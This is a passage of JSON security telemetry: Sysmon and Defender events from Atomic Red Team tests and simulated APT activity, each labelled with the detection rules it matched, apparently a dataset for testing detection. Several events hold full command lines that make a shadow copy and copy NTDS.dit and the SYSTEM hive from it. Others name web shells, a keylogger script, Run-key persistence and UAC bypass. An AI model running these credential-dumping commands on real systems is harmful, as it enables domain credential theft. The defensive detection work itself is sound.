(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00106E2C4B00","ProcessId":5488,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:26.626"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4124,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:26.642464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"vssadmin.exe create shadow /for=C:","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Command Line Interface for Microsoft® Volume Shadow Copy Service ","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AC561205CD59BBCDB158525978FF65BDF17FDC3C,MD5=614B5C4238977130AA2270C8AD58CE6C,SHA256=D7577FB88CCA3169C7931DC0D8EC9A444227DC14F6C71D6D39D86A0C5CAD1976,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE","Image":"C:\\Windows\\System32\\vssadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"vssadmin.exe create shadow /for=C:\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DD9E-5D31-0000-00100C3F4B00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00105E414B00","ProcessId":6584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:26.981"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4129,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:26.989143Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\Extract\\ntds.dit\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00101A4A4B00","ProcessId":5772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:27.156"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4131,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:27.169217Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\Extract\\VSC_SYSTEM_HIVE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00102D4D4B00","ProcessId":976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:27.192"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4132,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:27.202862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{511224D4-1EB4-47B9-BC4A-37E21F923FED}","Detection Time":"2019-07-18T20:40:00.580Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1056\\Get-Keystrokes.ps1","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147725349","Threat Name":"Trojan:PowerShell/Powersploit.M","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":37,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:40:00.730676Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{8791B1FB-0FE7-412E-B084-524CB5A221F3}","Detection Time":"2019-07-18T20:40:13.775Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1086\\payloads\\test.xsl","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147735426","Threat Name":"Trojan:XML/Exeselrun.gen!A","Type ID":"2","Type Name":"%%823","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":48,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:40:16.396422Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":75,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:16.418508Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"6","Category Name":"Backdoor","Detection ID":"{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}","Detection Time":"2019-07-18T20:40:18.385Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\cmd.aspx","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147683177","Threat Name":"Backdoor:ASP/Ace.T","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":76,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:17.508276Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}","Detection Time":"2019-07-18T20:41:40.357Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147726426","Threat Name":"Trojan:Win32/Sehyioa.A!cl","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":95,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:48.236136Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"containerfile:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp; file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0037); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0045); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0065); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0068)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"40013F0F-EF76-4940-A8B2-4DE50BE9AAC3"},"EventID":1116,"EventRecordID":102,"Execution_attributes":{"ProcessID":6024,"ThreadID":6068},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:51:50.798994Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer","New RUN Key Pointing to Suspicious Folder","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Tendyron","UtcTime":"2020-10-15 13:17:02.706"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":416056,"Execution_attributes":{"ProcessID":3368,"ThreadID":4748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-15T13:17:02.736849Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=F359D3C074135BBCA9A4C98A6B6544690EDAE93D,MD5=02825976B19F123872914C233CF309BB,SHA256=0DD700BB6A992FFD40B0D2B41FC5875CD3B319A7079F67B3DC37428B5005B354,IMPHASH=45D79E943E6D34075123B434B5AE3DEB","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\OnKeyToken_KEB.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-15 13:17:02.659"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":416061,"Execution_attributes":{"ProcessID":3368,"ThreadID":4756},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-15T13:17:02.963417Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.734","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\__tmp_rar_sfx_access_check_2914968","UtcTime":"2020-10-23 21:57:34.734"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423992,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:34.745175Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.751","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\d948","UtcTime":"2020-10-23 21:57:34.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423993,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:34.767786Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:22:14.491","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\sduchxll.tmp","UtcTime":"2020-10-23 21:57:36.328"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424049,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.332819Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424060,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375368Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424061,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375422Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 